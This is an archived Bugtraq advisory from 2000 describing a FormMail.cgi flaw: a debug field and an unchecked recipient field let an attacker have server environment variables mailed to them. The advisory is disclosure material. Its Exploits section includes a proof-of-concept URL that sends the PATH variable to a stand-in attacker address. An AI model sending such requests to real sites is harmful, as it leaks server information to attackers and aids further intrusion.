Bugtraq mailing list archives
Black Watch Labs Vulnerability Alert
From: blackwatchlabs () PERFECTOTECH COM (Black Watch Labs)
Date: Wed, 10 May 2000 16:11:23 -0700
Dear Security Professional, The following vulnerability: "Environment and setup variables can be viewed through FormMail script" is in the text of the message below and has just been posted to the Black Watch Labs Web site at http://www.perfectotech.com/blackwatchlabs/ Thank you, Black Watch Labs If you wish to unsubscribe to this Black Watch Labs email update, please click on reply and type the word "Unsubscribe" in the subject line. -------------------------------------------------------------------------------------------------------------------------------- Environment and setup variables can be viewed through FormMail script Perfectos Black Watch Labs Advisory BWL 00-06 (May 10, 2000) Name: Environment and setup variables can be viewed through FormMail script Black Watch Labs ID: BWL 00-06 Date Released: May 10, 2000 Products affected: Matts FormMail.cgi Number of affected sites: It is estimated that there are thousands of pages containing links to the formmail script. Category: Application(HTML): modification of parameters, debug options. Summary: The script allows several environment variables to be viewed by the attacker, who can gain useful information on the site, making further attacks more feasible. Analysis: FormMail contains a debug field named env_report, whose value is a list of environment variables (accessed via $ENV[name]) separated by commas. These variables (if they exist) are embedded into the message body. Furthermore, the script does not check the integrity of the recipient, thus the recipient field can be changed, so the message will be sent to the attackers account. Thus the attacker can gain the environment information. Exploits: FormMail: assume the URL for the script is http://www.formmail.site/cgi-bin/formmail.cgi, then to get the PATH environment parameter (i.e. to send it to account: attacker () attacker site), all there is to do is to request the following URL: http://www.formmail.site/cgibin/formmail.cgi?env_report=PATH&recipient=attacker () attacker site&required=&firstname=&lastname=&email=&message=&Submit=Submit Vendor Patch or workaround: None submitted at the time of this release. References and Links: Matts Script Archive (FormMail): http://www.worldwidemart.com/scripts/formmail.shtml About Black Watch Labs (www.perfectotech.com/blackwatchlabs/) Black Watch Labs is a research group operated by Perfecto Technologies Inc., leader in Web application security management. Black Watch Labs was established in order to further the knowledge of the Internet community in the arena of Web application security management. Black Watch Labs publishes security advisories regularly, which are maintained at http://www.perfectotech.com/blackwatchlabs/, and are also posted to relevant security lists and websites. Black Watch Labs also operates a Web application security mailing list, which can be subscribed to at http://www.perfectotech.com/blackwatchlabs/. For more info about Black Watch Labs and Web Application Security Management, please call (408) 855-9500 or email BlackWatchLabs () perfectotech com About Perfecto Technologies (www.perfectotech.com) Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto Technologies pioneered the market for Web Application Security Management software. AppShield, Perfecto Technologies flagship product offering, is the first to provide extreme security for customer-facing applications in dynamic Web site environments. Perfecto Technologies has customers in many sectors including, banking, etailing, finance, government, and healthcare. Privately held, Perfecto Technologies is funded by blue-chip venture capital firms and industry leaders, including Sequoia Capital, Walden, and Intel Corporation. More information about Perfecto Technologies may be obtained by visiting the Companys Website at www.perfectotech.com or by calling the Company directly at (408) 855-9500. Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved. Permission is hereby granted to reproduce and distribute the application security alerts herein in their entirety, provided the information, this notice and all other Perfecto Technologies marks remain intact. Specific Limitations on Use of the Black Watch Labs Advisories THIS ADVISORY INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY RISKS AND ISSUES ASSOCIATED WITH SITES ON THE INTERNET, INCLUDING, POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS ADVISORY IS SOLELY FOR THE PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY PERFECTO TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR ANY IMPROPER OR ILLEGAL PURPOSE, INCLUDING TO VIOLATE THE SECURITY OF ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY IMPROPER PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND OTHER COUNTRIES. NO WARRANTY Any material furnished by Perfecto Technologies is furnished on an as is basis and may change without notice. Perfecto Technologies makes no warranties of any kind, either expressed or implied as to any matter including but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Neither does Perfecto Technologies make any warranty of any kind with respect to freedom from patent, trademark or copyright infringement. In no event shall Perfecto Technologies be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
Current thread:
- Re: RFP2K04: Mining BlackICE with RFPickAxe, (continued)
- Re: RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 19)
- revised patches for kerberos vulnerability Tom Yu (May 19)
- Microsoft Security Bulletin (MS00-029) Microsoft Product Security (May 19)
- BindView Security Advisory: jolt2 - Remote DoS against NT, W2K, 9x BindView Security Advisory (May 19)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 17)
- KNapster Vulnerability Compromises User-readable Files Tom Daniels (May 10)
- Gnapster Vulnerability Compromises User-readable Files Jim Early (May 10)
- Possible symlink problems with Netscape 4.73 foo (May 10)
- SSH Authentication Vulnerability John P. McNeely (May 10)
- Re: [cert] SSH Authentication Vulnerability Ignacio Kadel-Garcia (May 11)
- Black Watch Labs Vulnerability Alert Black Watch Labs (May 10)
- issues with free Perl CGI's (Re: Black Watch Labs...) Peter W (May 10)
- Advisory: Unchecked system(blaat $var blaat) call in Bugzilla 2.8 Frank van Vliet (May 10)
- Re: Advisory: Unchecked system(blaat $var blaat) call in Bugzilla 2.8 Todd C. Miller (May 10)
- NetStructure 7110 console backdoor Brian Oblivion (May 09)
- NetStructure 7180 remote backdoor vulnerability Brian Oblivion (May 09)
- FreeBSD Security Advisory: FreeBSD-SA-00:16.golddig FreeBSD Security Officer (May 09)
- FreeBSD Security Advisory: FreeBSD-SA-00:17.libmytinfo FreeBSD Security Officer (May 09)
- FreeBSD Security Advisory: FreeBSD-SA-00:18.gnapster FreeBSD Security Officer (May 09)
- Self-Replication Using Gnutella Seth McGann (May 09)
- ALERT: Bypassing Warnings For Invalid SSL Certificates In Netscape Navigator Mitja Kolsek (May 10)